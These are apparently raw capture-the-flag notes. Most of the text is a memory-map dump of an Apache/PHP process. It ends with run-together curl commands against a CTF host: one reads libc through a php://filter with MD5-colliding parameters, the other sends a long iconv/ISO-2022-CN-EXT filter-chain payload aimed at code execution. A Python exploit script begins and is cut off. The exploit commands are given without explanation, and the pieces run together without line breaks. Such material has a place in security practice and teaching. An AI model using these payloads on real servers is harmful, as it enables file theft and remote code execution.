7fce62dd4000-7fce62ddb000 r--p 00015000 00:39 2752897 /usr/lib/x86_64-linux-gnu/librtmp.so.1
7fce62ddb000-7fce62ddc000 ---p 0001c000 00:39 2752897 /usr/lib/x86_64-linux-gnu/librtmp.so.1
7fce62ddc000-7fce62ddd000 r--p 0001c000 00:39 2752897 /usr/lib/x86_64-linux-gnu/librtmp.so.1
7fce62ddd000-7fce62dde000 rw-p 0001d000 00:39 2752897 /usr/lib/x86_64-linux-gnu/librtmp.so.1
7fce62dde000-7fce62de0000 r--p 00000000 00:39 2651260 /usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
7fce62de0000-7fce62de4000 r-xp 00002000 00:39 2651260 /usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
7fce62de4000-7fce62dfd000 r--p 00006000 00:39 2651260 /usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
7fce62dfd000-7fce62dfe000 r--p 0001e000 00:39 2651260 /usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
7fce62dfe000-7fce62dff000 rw-p 0001f000 00:39 2651260 /usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
7fce62dff000-7fce62e04000 r--p 00000000 00:39 2752876 /usr/lib/x86_64-linux-gnu/libnghttp2.so.14.20.1
7fce62e04000-7fce62e1a000 r-xp 00005000 00:39 2752876 /usr/lib/x86_64-linux-gnu/libnghttp2.so.14.20.1
7fce62e1a000-7fce62e28000 r--p 0001b000 00:39 2752876 /usr/lib/x86_64-linux-gnu/libnghttp2.so.14.20.1
7fce62e28000-7fce62e2b000 r--p 00028000 00:39 2752876 /usr/lib/x86_64-linux-gnu/libnghttp2.so.14.20.1
7fce62e2b000-7fce62e2c000 rw-p 0002b000 00:39 2752876 /usr/lib/x86_64-linux-gnu/libnghttp2.so.14.20.1
7fce62e2c000-7fce62e2f000 r--p 00000000 00:39 2650532 /lib/x86_64-linux-gnu/liblzma.so.5.2.5
7fce62e2f000-7fce62e47000 r-xp 00003000 00:39 2650532 /lib/x86_64-linux-gnu/liblzma.so.5.2.5
7fce62e47000-7fce62e52000 r--p 0001b000 00:39 2650532 /lib/x86_64-linux-gnu/liblzma.so.5.2.5
7fce62e52000-7fce62e53000 r--p 00025000 00:39 2650532 /lib/x86_64-linux-gnu/liblzma.so.5.2.5
7fce62e53000-7fce62e54000 rw-p 00026000 00:39 2650532 /lib/x86_64-linux-gnu/liblzma.so.5.2.5
7fce62e54000-7fce62eba000 r--p 00000000 00:39 2658363 /usr/lib/x86_64-linux-gnu/libicuuc.so.67.1
7fce62eba000-7fce62fa0000 r-xp 00066000 00:39 2658363 /usr/lib/x86_64-linux-gnu/libicuuc.so.67.1
7fce62fa0000-7fce63027000 r--p 0014c000 00:39 2658363 /usr/lib/x86_64-linux-gnu/libicuuc.so.67.1
7fce63027000-7fce63028000 ---p 001d3000 00:39 2658363 /usr/lib/x86_64-linux-gnu/libicuuc.so.67.1
7fce63028000-7fce6303a000 r--p 001d3000 00:39 2658363 /usr/lib/x86_64-linux-gnu/libicuuc.so.67.1
7fce6303a000-7fce6303b000 rw-p 001e5000 00:39 2658363 /usr/lib/x86_64-linux-gnu/libicuuc.so.67.1
7fce6303b000-7fce6303d000 rw-p 00000000 00:00 0
7fce6303d000-7fce6304b000 r--p 00000000 00:39 2650570 /lib/x86_64-linux-gnu/libtinfo.so.6.2
7fce6304b000-7fce63059000 r-xp 0000e000 00:39 2650570 /lib/x86_64-linux-gnu/libtinfo.so.6.2
7fce63059000-7fce63067000 r--p 0001c000 00:39 2650570 /lib/x86_64-linux-gnu/libtinfo.so.6.2
7fce63067000-7fce6306b000 r--p 00029000 00:39 2650570 /lib/x86_64-linux-gnu/libtinfo.so.6.2
7fce6306b000-7fce6306c000 rw-p 0002d000 00:39 2650570 /lib/x86_64-linux-gnu/libtinfo.so.6.2
7fce6306c000-7fce6307b000 r--p 00000000 00:39 2752832 /usr/lib/x86_64-linux-gnu/libcurl.so.4.7.0
7fce6307b000-7fce630e3000 r-xp 0000f000 00:39 2752832 /usr/lib/x86_64-linux-gnu/libcurl.so.4.7.0
7fce630e3000-7fce63100000 r--p 00077000 00:39 2752832 /usr/lib/x86_64-linux-gnu/libcurl.so.4.7.0
7fce63100000-7fce63104000 r--p 00093000 00:39 2752832 /usr/lib/x86_64-linux-gnu/libcurl.so.4.7.0
7fce63104000-7fce63106000 rw-p 00097000 00:39 2752832 /usr/lib/x86_64-linux-gnu/libcurl.so.4.7.0
7fce63106000-7fce63107000 rw-p 00000000 00:00 0
7fce63107000-7fce63135000 r--p 00000000 00:39 2658381 /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.10
7fce63135000-7fce63251000 r-xp 0002e000 00:39 2658381 /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.10
7fce63251000-7fce632a9000 r--p 0014a000 00:39 2658381 /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.10
7fce632a9000-7fce632b2000 r--p 001a1000 00:39 2658381 /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.10
7fce632b2000-7fce632b3000 rw-p 001aa000 00:39 2658381 /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.10
7fce632b3000-7fce632b5000 rw-p 00000000 00:00 0
7fce632b5000-7fce632c5000 r--p 00000000 00:39 2658379 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7fce632c5000-7fce633bd000 r-xp 00010000 00:39 2658379 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7fce633bd000-7fce633f1000 r--p 00108000 00:39 2658379 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7fce633f1000-7fce633f5000 r--p 0013b000 00:39 2658379 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7fce633f5000-7fce633f8000 rw-p 0013f000 00:39 2658379 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7fce633f8000-7fce6340e000 r--p 00000000 00:39 2659058 /lib/x86_64-linux-gnu/libreadline.so.8.1
7fce6340e000-7fce6343a000 r-xp 00016000 00:39 2659058 /lib/x86_64-linux-gnu/libreadline.so.8.1
7fce6343a000-7fce63444000 r--p 00042000 00:39 2659058 /lib/x86_64-linux-gnu/libreadline.so.8.1
7fce63444000-7fce63445000 ---p 0004c000 00:39 2659058 /lib/x86_64-linux-gnu/libreadline.so.8.1
7fce63445000-7fce63447000 r--p 0004c000 00:39 2659058 /lib/x86_64-linux-gnu/libreadline.so.8.1
7fce63447000-7fce6344e000 rw-p 0004e000 00:39 2659058 /lib/x86_64-linux-gnu/libreadline.so.8.1
7fce6344e000-7fce6344f000 rw-p 00000000 00:00 0
7fce6344f000-7fce63453000 r--p 00000000 00:39 2650559 /lib/x86_64-linux-gnu/libresolv-2.31.so
7fce63453000-7fce63461000 r-xp 00004000 00:39 2650559 /lib/x86_64-linux-gnu/libresolv-2.31.so
7fce63461000-7fce63464000 r--p 00012000 00:39 2650559 /lib/x86_64-linux-gnu/libresolv-2.31.so
7fce63464000-7fce63465000 ---p 00015000 00:39 2650559 /lib/x86_64-linux-gnu/libresolv-2.31.so
7fce63465000-7fce63466000 r--p 00015000 00:39 2650559 /lib/x86_64-linux-gnu/libresolv-2.31.so
7fce63466000-7fce63467000 rw-p 00016000 00:39 2650559 /lib/x86_64-linux-gnu/libresolv-2.31.so
7fce63467000-7fce63469000 rw-p 00000000 00:00 0
7fce63469000-7fce6346a000 r--p 00000000 00:39 2659074 /usr/lib/x86_64-linux-gnu/libargon2.so.1
7fce6346a000-7fce6346f000 r-xp 00001000 00:39 2659074 /usr/lib/x86_64-linux-gnu/libargon2.so.1
7fce6346f000-7fce63471000 r--p 00006000 00:39 2659074 /usr/lib/x86_64-linux-gnu/libargon2.so.1
7fce63471000-7fce63472000 r--p 00007000 00:39 2659074 /usr/lib/x86_64-linux-gnu/libargon2.so.1
7fce63472000-7fce63473000 rw-p 00008000 00:39 2659074 /usr/lib/x86_64-linux-gnu/libargon2.so.1
7fce63473000-7fce63475000 r--p 00000000 00:39 2658278 /usr/lib/apache2/modules/mod_negotiation.so
7fce63475000-7fce6347a000 r-xp 00002000 00:39 2658278 /usr/lib/apache2/modules/mod_negotiation.so
7fce6347a000-7fce6347b000 r--p 00007000 00:39 2658278 /usr/lib/apache2/modules/mod_negotiation.so
7fce6347b000-7fce6347c000 ---p 00008000 00:39 2658278 /usr/lib/apache2/modules/mod_negotiation.so
7fce6347c000-7fce6347d000 r--p 00008000 00:39 2658278 /usr/lib/apache2/modules/mod_negotiation.so
7fce6347d000-7fce6347e000 rw-p 00009000 00:39 2658278 /usr/lib/apache2/modules/mod_negotiation.so
7fce6347e000-7fce63480000 rw-p 00000000 00:00 0
7fce63481000-7fce63484000 r--p 00000000 00:39 2658276 /usr/lib/apache2/modules/mod_mpm_prefork.so
7fce63484000-7fce63487000 r-xp 00003000 00:39 2658276 /usr/lib/apache2/modules/mod_mpm_prefork.so
7fce63487000-7fce63489000 r--p 00006000 00:39 2658276 /usr/lib/apache2/modules/mod_mpm_prefork.so
7fce63489000-7fce6348a000 r--p 00007000 00:39 2658276 /usr/lib/apache2/modules/mod_mpm_prefork.so
7fce6348a000-7fce6348b000 rw-p 00008000 00:39 2658276 /usr/lib/apache2/modules/mod_mpm_prefork.so
7fce6348b000-7fce6348d000 rw-p 00000000 00:00 0
7fce6348d000-7fce6348f000 rw-p 00000000 00:00 0
7fce6348f000-7fce63491000 r--p 00000000 00:39 2658273 /usr/lib/apache2/modules/mod_mime.so
7fce63491000-7fce63493000 r-xp 00002000 00:39 2658273 /usr/lib/apache2/modules/mod_mime.so
7fce63493000-7fce63494000 r--p 00004000 00:39 2658273 /usr/lib/apache2/modules/mod_mime.so
7fce63494000-7fce63495000 ---p 00005000 00:39 2658273 /usr/lib/apache2/modules/mod_mime.so
7fce63495000-7fce63496000 r--p 00005000 00:39 2658273 /usr/lib/apache2/modules/mod_mime.so
7fce63496000-7fce63497000 rw-p 00006000 00:39 2658273 /usr/lib/apache2/modules/mod_mime.so
7fce63497000-7fce6349b000 rw-p 00000000 00:00 0
7fce6349b000-7fce6349d000 rw-p 00000000 00:00 0
7fce6349d000-7fce6349e000 r--p 00000000 00:39 2658254 /usr/lib/apache2/modules/mod_filter.so
7fce6349e000-7fce634a0000 r-xp 00001000 00:39 2658254 /usr/lib/apache2/modules/mod_filter.so
7fce634a0000-7fce634a1000 r--p 00003000 00:39 2658254 /usr/lib/apache2/modules/mod_filter.so
7fce634a1000-7fce634a2000 r--p 00003000 00:39 2658254 /usr/lib/apache2/modules/mod_filter.so
7fce634a2000-7fce634a3000 rw-p 00004000 00:39 2658254 /usr/lib/apache2/modules/mod_filter.so
7fce634a3000-7fce634a5000 rw-p 00000000 00:00 0
7fce634a6000-7fce634a7000 r--p 00000000 00:39 2658250 /usr/lib/apache2/modules/mod_env.so
7fce634a7000-7fce634a8000 r-xp 00001000 00:39 2658250 /usr/lib/apache2/modules/mod_env.so
7fce634a8000-7fce634a9000 r--p 00002000 00:39 2658250 /usr/lib/apache2/modules/mod_env.so
7fce634a9000-7fce634aa000 r--p 00002000 00:39 2658250 /usr/lib/apache2/modules/mod_env.so
7fce634aa000-7fce634ab000 rw-p 00003000 00:39 2658250 /usr/lib/apache2/modules/mod_env.so
7fce634ab000-7fce634ad000 rw-p 00000000 00:00 0
7fce634ae000-7fce634af000 r--p 00000000 00:39 2658247 /usr/lib/apache2/modules/mod_dir.so
7fce634af000-7fce634b0000 r-xp 00001000 00:39 2658247 /usr/lib/apache2/modules/mod_dir.so
7fce634b0000-7fce634b1000 r--p 00002000 00:39 2658247 /usr/lib/apache2/modules/mod_dir.so
7fce634b1000-7fce634b2000 r--p 00002000 00:39 2658247 /usr/lib/apache2/modules/mod_dir.so
7fce634b2000-7fce634b3000 rw-p 00003000 00:39 2658247 /usr/lib/apache2/modules/mod_dir.so
7fce634b3000-7fce634b6000 r--p 00000000 00:39 2650576 /lib/x86_64-linux-gnu/libz.so.1.2.11
7fce634b6000-7fce634c7000 r-xp 00003000 00:39 2650576 /lib/x86_64-linux-gnu/libz.so.1.2.11
7fce634c7000-7fce634cd000 r--p 00014000 00:39 2650576 /lib/x86_64-linux-gnu/libz.so.1.2.11
7fce634cd000-7fce634ce000 ---p 0001a000 00:39 2650576 /lib/x86_64-linux-gnu/libz.so.1.2.11
7fce634ce000-7fce634cf000 r--p 0001a000 00:39 2650576 /lib/x86_64-linux-gnu/libz.so.1.2.11
7fce634cf000-7fce634d0000 rw-p 0001b000 00:39 2650576 /lib/x86_64-linux-gnu/libz.so.1.2.11
7fce634d0000-7fce634d4000 rw-p 00000000 00:00 0
7fce634d4000-7fce634d8000 rw-p 00000000 00:00 0
7fce634d8000-7fce634da000 r--p 00000000 00:39 2658245 /usr/lib/apache2/modules/mod_deflate.so
7fce634da000-7fce634df000 r-xp 00002000 00:39 2658245 /usr/lib/apache2/modules/mod_deflate.so
7fce634df000-7fce634e1000 r--p 00007000 00:39 2658245 /usr/lib/apache2/modules/mod_deflate.so
7fce634e1000-7fce634e2000 r--p 00008000 00:39 2658245 /usr/lib/apache2/modules/mod_deflate.so
7fce634e2000-7fce634e3000 rw-p 00009000 00:39 2658245 /usr/lib/apache2/modules/mod_deflate.so
7fce634e3000-7fce634e5000 rw-p 00000000 00:00 0
7fce634e5000-7fce634e7000 r--p 00000000 00:39 2658227 /usr/lib/apache2/modules/mod_autoindex.so
7fce634e7000-7fce634ec000 r-xp 00002000 00:39 2658227 /usr/lib/apache2/modules/mod_autoindex.so
7fce634ec000-7fce634ee000 r--p 00007000 00:39 2658227 /usr/lib/apache2/modules/mod_autoindex.so
7fce634ee000-7fce634ef000 r--p 00008000 00:39 2658227 /usr/lib/apache2/modules/mod_autoindex.so
7fce634ef000-7fce634f0000 rw-p 00009000 00:39 2658227 /usr/lib/apache2/modules/mod_autoindex.so
7fce634f0000-7fce634f2000 rw-p 00000000 00:00 0
7fce634f2000-7fce634f3000 r--p 00000000 00:39 2658226 /usr/lib/apache2/modules/mod_authz_user.so
7fce634f3000-7fce634f4000 r-xp 00001000 00:39 2658226 /usr/lib/apache2/modules/mod_authz_user.so
7fce634f4000-7fce634f5000 r--p 00002000 00:39 2658226 /usr/lib/apache2/modules/mod_authz_user.so
7fce634f5000-7fce634f6000 r--p 00002000 00:39 2658226 /usr/lib/apache2/modules/mod_authz_user.so
7fce634f6000-7fce634f7000 rw-p 00003000 00:39 2658226 /usr/lib/apache2/modules/mod_authz_user.so
7fce634f7000-7fce634f9000 rw-p 00000000 00:00 0
7fce634f9000-7fce634fa000 r--p 00000000 00:39 2658224 /usr/lib/apache2/modules/mod_authz_host.so
7fce634fa000-7fce634fb000 r-xp 00001000 00:39 2658224 /usr/lib/apache2/modules/mod_authz_host.so
7fce634fb000-7fce634fc000 r--p 00002000 00:39 2658224 /usr/lib/apache2/modules/mod_authz_host.so
7fce634fc000-7fce634fd000 r--p 00002000 00:39 2658224 /usr/lib/apache2/modules/mod_authz_host.so
7fce634fd000-7fce634fe000 rw-p 00003000 00:39 2658224 /usr/lib/apache2/modules/mod_authz_host.so
7fce634fe000-7fce63500000 rw-p 00000000 00:00 0
7fce63500000-7fce63502000 r--p 00000000 00:39 2658220 /usr/lib/apache2/modules/mod_authz_core.so
7fce63502000-7fce63504000 r-xp 00002000 00:39 2658220 /usr/lib/apache2/modules/mod_authz_core.so
7fce63504000-7fce63506000 r--p 00004000 00:39 2658220 /usr/lib/apache2/modules/mod_authz_core.so
7fce63506000-7fce63507000 r--p 00005000 00:39 2658220 /usr/lib/apache2/modules/mod_authz_core.so
7fce63507000-7fce63508000 rw-p 00006000 00:39 2658220 /usr/lib/apache2/modules/mod_authz_core.so
7fce63508000-7fce6350a000 rw-p 00000000 00:00 0
7fce6350a000-7fce6350b000 r--p 00000000 00:39 2658216 /usr/lib/apache2/modules/mod_authn_file.so
7fce6350b000-7fce6350c000 r-xp 00001000 00:39 2658216 /usr/lib/apache2/modules/mod_authn_file.so
7fce6350c000-7fce6350d000 r--p 00002000 00:39 2658216 /usr/lib/apache2/modules/mod_authn_file.so
7fce6350d000-7fce6350e000 r--p 00002000 00:39 2658216 /usr/lib/apache2/modules/mod_authn_file.so
7fce6350e000-7fce6350f000 rw-p 00003000 00:39 2658216 /usr/lib/apache2/modules/mod_authn_file.so
7fce6350f000-7fce63511000 rw-p 00000000 00:00 0
7fce63511000-7fce63512000 r--p 00000000 00:39 2658213 /usr/lib/apache2/modules/mod_authn_core.so
7fce63512000-7fce63513000 r-xp 00001000 00:39 2658213 /usr/lib/apache2/modules/mod_authn_core.so
7fce63513000-7fce63514000 r--p 00002000 00:39 2658213 /usr/lib/apache2/modules/mod_authn_core.so
7fce63514000-7fce63515000 r--p 00002000 00:39 2658213 /usr/lib/apache2/modules/mod_authn_core.so
7fce63515000-7fce63516000 rw-p 00003000 00:39 2658213 /usr/lib/apache2/modules/mod_authn_core.so
7fce63516000-7fce63518000 rw-p 00000000 00:00 0
7fce63518000-7fce63519000 r--p 00000000 00:39 2658209 /usr/lib/apache2/modules/mod_auth_basic.so
7fce63519000-7fce6351b000 r-xp 00001000 00:39 2658209 /usr/lib/apache2/modules/mod_auth_basic.so
7fce6351b000-7fce6351c000 r--p 00003000 00:39 2658209 /usr/lib/apache2/modules/mod_auth_basic.so
7fce6351c000-7fce6351d000 r--p 00003000 00:39 2658209 /usr/lib/apache2/modules/mod_auth_basic.so
7fce6351d000-7fce6351e000 rw-p 00004000 00:39 2658209 /usr/lib/apache2/modules/mod_auth_basic.so
7fce6351e000-7fce63520000 rw-p 00000000 00:00 0
7fce63520000-7fce63521000 r--p 00000000 00:39 2658206 /usr/lib/apache2/modules/mod_alias.so
7fce63521000-7fce63523000 r-xp 00001000 00:39 2658206 /usr/lib/apache2/modules/mod_alias.so
7fce63523000-7fce63524000 r--p 00003000 00:39 2658206 /usr/lib/apache2/modules/mod_alias.so
7fce63524000-7fce63525000 r--p 00003000 00:39 2658206 /usr/lib/apache2/modules/mod_alias.so
7fce63525000-7fce63526000 rw-p 00004000 00:39 2658206 /usr/lib/apache2/modules/mod_alias.so
7fce63526000-7fce63528000 rw-p 00000000 00:00 0
7fce63528000-7fce63529000 r--p 00000000 00:39 2658204 /usr/lib/apache2/modules/mod_access_compat.so
7fce63529000-7fce6352a000 r-xp 00001000 00:39 2658204 /usr/lib/apache2/modules/mod_access_compat.so
7fce6352a000-7fce6352b000 r--p 00002000 00:39 2658204 /usr/lib/apache2/modules/mod_access_compat.so
7fce6352b000-7fce6352c000 r--p 00002000 00:39 2658204 /usr/lib/apache2/modules/mod_access_compat.so
7fce6352c000-7fce6352d000 rw-p 00003000 00:39 2658204 /usr/lib/apache2/modules/mod_access_compat.so
7fce6352d000-7fce63569000 rw-p 00000000 00:00 0
7fce63569000-7fce6356a000 r--p 00000000 00:39 2650520 /lib/x86_64-linux-gnu/libdl-2.31.so
7fce6356a000-7fce6356c000 r-xp 00001000 00:39 2650520 /lib/x86_64-linux-gnu/libdl-2.31.so
7fce6356c000-7fce6356d000 r--p 00003000 00:39 2650520 /lib/x86_64-linux-gnu/libdl-2.31.so
7fce6356d000-7fce6356e000 r--p 00003000 00:39 2650520 /lib/x86_64-linux-gnu/libdl-2.31.so
7fce6356e000-7fce6356f000 rw-p 00004000 00:39 2650520 /lib/x86_64-linux-gnu/libdl-2.31.so
7fce6356f000-7fce63571000 r--p 00000000 00:39 2651300 /usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
7fce63571000-7fce63575000 r-xp 00002000 00:39 2651300 /usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
7fce63575000-7fce63576000 r--p 00006000 00:39 2651300 /usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
7fce63576000-7fce63577000 r--p 00006000 00:39 2651300 /usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
7fce63577000-7fce63578000 rw-p 00007000 00:39 2651300 /usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
7fce63578000-7fce6357c000 r--p 00000000 00:39 2658154 /lib/x86_64-linux-gnu/libexpat.so.1.6.12
7fce6357c000-7fce63599000 r-xp 00004000 00:39 2658154 /lib/x86_64-linux-gnu/libexpat.so.1.6.12
7fce63599000-7fce635a3000 r--p 00021000 00:39 2658154 /lib/x86_64-linux-gnu/libexpat.so.1.6.12
7fce635a3000-7fce635a4000 ---p 0002b000 00:39 2658154 /lib/x86_64-linux-gnu/libexpat.so.1.6.12
7fce635a4000-7fce635a6000 r--p 0002b000 00:39 2658154 /lib/x86_64-linux-gnu/libexpat.so.1.6.12
7fce635a6000-7fce635a7000 rw-p 0002d000 00:39 2658154 /lib/x86_64-linux-gnu/libexpat.so.1.6.12
7fce635a7000-7fce635a9000 rw-p 00000000 00:00 0
7fce635a9000-7fce635ab000 r--p 00000000 00:39 2650519 /lib/x86_64-linux-gnu/libcrypt.so.1.1.0
7fce635ab000-7fce635c0000 r-xp 00002000 00:39 2650519 /lib/x86_64-linux-gnu/libcrypt.so.1.1.0
7fce635c0000-7fce635da000 r--p 00017000 00:39 2650519 /lib/x86_64-linux-gnu/libcrypt.so.1.1.0
7fce635da000-7fce635db000 r--p 00030000 00:39 2650519 /lib/x86_64-linux-gnu/libcrypt.so.1.1.0
7fce635db000-7fce635dc000 rw-p 00031000 00:39 2650519 /lib/x86_64-linux-gnu/libcrypt.so.1.1.0
7fce635dc000-7fce635e4000 rw-p 00000000 00:00 0
7fce635e4000-7fce63609000 r--p 00000000 00:39 2650512 /lib/x86_64-linux-gnu/libc-2.31.so
7fce63609000-7fce63754000 r-xp 00025000 00:39 2650512 /lib/x86_64-linux-gnu/libc-2.31.so
7fce63754000-7fce6379e000 r--p 00170000 00:39 2650512 /lib/x86_64-linux-gnu/libc-2.31.so
7fce6379e000-7fce6379f000 ---p 001ba000 00:39 2650512 /lib/x86_64-linux-gnu/libc-2.31.so
7fce6379f000-7fce637a2000 r--p 001ba000 00:39 2650512 /lib/x86_64-linux-gnu/libc-2.31.so
7fce637a2000-7fce637a5000 rw-p 001bd000 00:39 2650512 /lib/x86_64-linux-gnu/libc-2.31.so
7fce637a5000-7fce637a9000 rw-p 00000000 00:00 0
7fce637a9000-7fce637b0000 r--p 00000000 00:39 2650557 /lib/x86_64-linux-gnu/libpthread-2.31.so
7fce637b0000-7fce637c0000 r-xp 00007000 00:39 2650557 /lib/x86_64-linux-gnu/libpthread-2.31.so
7fce637c0000-7fce637c5000 r--p 00017000 00:39 2650557 /lib/x86_64-linux-gnu/libpthread-2.31.so
7fce637c5000-7fce637c6000 r--p 0001b000 00:39 2650557 /lib/x86_64-linux-gnu/libpthread-2.31.so
7fce637c6000-7fce637c7000 rw-p 0001c000 00:39 2650557 /lib/x86_64-linux-gnu/libpthread-2.31.so
7fce637c7000-7fce637cb000 rw-p 00000000 00:00 0
7fce637cb000-7fce637d8000 r--p 00000000 00:39 2658343 /usr/lib/x86_64-linux-gnu/libapr-1.so.0.7.0
7fce637d8000-7fce637fa000 r-xp 0000d000 00:39 2658343 /usr/lib/x86_64-linux-gnu/libapr-1.so.0.7.0
7fce637fa000-7fce63805000 r--p 0002f000 00:39 2658343 /usr/lib/x86_64-linux-gnu/libapr-1.so.0.7.0
7fce63805000-7fce63806000 ---p 0003a000 00:39 2658343 /usr/lib/x86_64-linux-gnu/libapr-1.so.0.7.0
7fce63806000-7fce63807000 r--p 0003a000 00:39 2658343 /usr/lib/x86_64-linux-gnu/libapr-1.so.0.7.0
7fce63807000-7fce63808000 rw-p 0003b000 00:39 2658343 /usr/lib/x86_64-linux-gnu/libapr-1.so.0.7.0
7fce63808000-7fce63811000 r--p 00000000 00:39 2658345 /usr/lib/x86_64-linux-gnu/libaprutil-1.so.0.6.1
7fce63811000-7fce6382b000 r-xp 00009000 00:39 2658345 /usr/lib/x86_64-linux-gnu/libaprutil-1.so.0.6.1
7fce6382b000-7fce63834000 r--p 00023000 00:39 2658345 /usr/lib/x86_64-linux-gnu/libaprutil-1.so.0.6.1
7fce63834000-7fce63835000 r--p 0002b000 00:39 2658345 /usr/lib/x86_64-linux-gnu/libaprutil-1.so.0.6.1
7fce63835000-7fce63836000 rw-p 0002c000 00:39 2658345 /usr/lib/x86_64-linux-gnu/libaprutil-1.so.0.6.1
7fce63836000-7fce63838000 r--p 00000000 00:39 2650556 /lib/x86_64-linux-gnu/libpcre.so.3.13.3
7fce63838000-7fce63889000 r-xp 00002000 00:39 2650556 /lib/x86_64-linux-gnu/libpcre.so.3.13.3
7fce63889000-7fce638a7000 r--p 00053000 00:39 2650556 /lib/x86_64-linux-gnu/libpcre.so.3.13.3
7fce638a7000-7fce638a8000 r--p 00070000 00:39 2650556 /lib/x86_64-linux-gnu/libpcre.so.3.13.3
7fce638a8000-7fce638a9000 rw-p 00071000 00:39 2650556 /lib/x86_64-linux-gnu/libpcre.so.3.13.3
7fce638a9000-7fce638ad000 rw-p 00000000 00:00 0
7fce638ad000-7fce638af000 rw-p 00000000 00:00 0
7fce638af000-7fce638b0000 r--p 00000000 00:39 2650500 /lib/x86_64-linux-gnu/ld-2.31.so
7fce638b0000-7fce638d0000 r-xp 00001000 00:39 2650500 /lib/x86_64-linux-gnu/ld-2.31.so
7fce638d0000-7fce638d8000 r--p 00021000 00:39 2650500 /lib/x86_64-linux-gnu/ld-2.31.so
7fce638d9000-7fce638da000 r--p 00029000 00:39 2650500 /lib/x86_64-linux-gnu/ld-2.31.so
7fce638da000-7fce638db000 rw-p 0002a000 00:39 2650500 /lib/x86_64-linux-gnu/ld-2.31.so
7fce638db000-7fce638dc000 rw-p 00000000 00:00 0
7ffc163ff000-7ffc16420000 rw-p 00000000 00:00 0 [stack]
7ffc1656a000-7ffc1656e000 r--p 00000000 00:00 0 [vvar]
7ffc1656e000-7ffc16570000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall]
#/lib/x86_64-linux-gnu/libc-2.31.so........herecurl -X POST http://node1.anna.nssctf.cn:28468/?file=php://filter/read=convert.base64-encode/resource=/lib/x86_64-linux-gnu/libc-2.31.so -d "a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"curl -X POST http://node1.anna.nssctf.cn:28468/?file=php://filter/read=zlib.inflate|zlib.inflate|dechunk|convert.iconv.latin1.latin1|dechunk|convert.iconv.latin1.latin1|dechunk|convert.iconv.latin1.latin1|dechunk|convert.iconv.UTF-8.ISO-2022-CN-EXT|convert.quoted-printable-decode|convert.iconv.latin1.latin1/resource=data:text/plain;base64,e3vXt%2b/NNlG2gL73WSu0QrdmLXC8806umlMwJ0t6ZsqUo6m8M1Pkd4rEC9yQY81grntgqbBPO2zz1%2bDpK1ZmsTLgBQlcp4uOhOaFr0wOy994PeqZ2Ek2Rvw6ZhzZJFM49XboqxlXo99snbbTdZMjfg0Maht13GOelk21SvsqVr02NW9ijgABK07V3nyk9VWr9EzW2/yG94/D9svW/Pxxetv11P8rfm9%2b917%2b9%2b3n8qULPY9VLX3/udtNxZ6fgAv%2b3LTN/vLphpvk5tLuv5vfyZfW231/Xlv//8Z9u%2b9Rvyuu2NXeq/v9c9rr%2bP3x8ie38%2bA37P/03/rXuU%2b83x%2bjr7D/v02a/fUb99/9/lxbb/erYvXvte%2b%2bp%2b7/f4F/nv2b89e/Xv9ut/fvjvvx1w/euh80L7n27etf94/2/0v79Hybvf160/zff2v3138rftb%2b%2bEzl2u3Xp77e%2bu/4322x6b/vXN9eW/um3%2bbc5rvr/ketm/rdrvbJqevbuZ9avpf/%2b%2bfvj8e7wuKeVq7dH3s8/76b3Hfv9X%2bd/gra1dfe6v9/N9q0532Ry6fPbPj9YdCbCgvlXqPN9f8fv5%2bYQygg2z539Jgu3ioXPcXT5VL9qOJRxaOK6ay44aXu1mM%2b/bt7ltf2bnLpTJEmYLZP/krTtKo7qTZvs6eoeqncJqA8ocp7reHlx3qPM%2bMX6wQq3SRQiDBcjnolFr7yo%2b3db8r55qem/1j55/X6/3%2biNQUTrQk5LHtldMzSY99LbvdLPe12bXlLQL3B2qV5hVOl7l/Otc%2baoi8m%2bJ8RAA== -d "a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"# -*- coding: UTF-8 -*- #
"""
@filename:post.py
@auther:JunLeon
@time:2025--23
"""
import requests
url = "http://node1.anna.nssctf.cn:28468/"
params = {
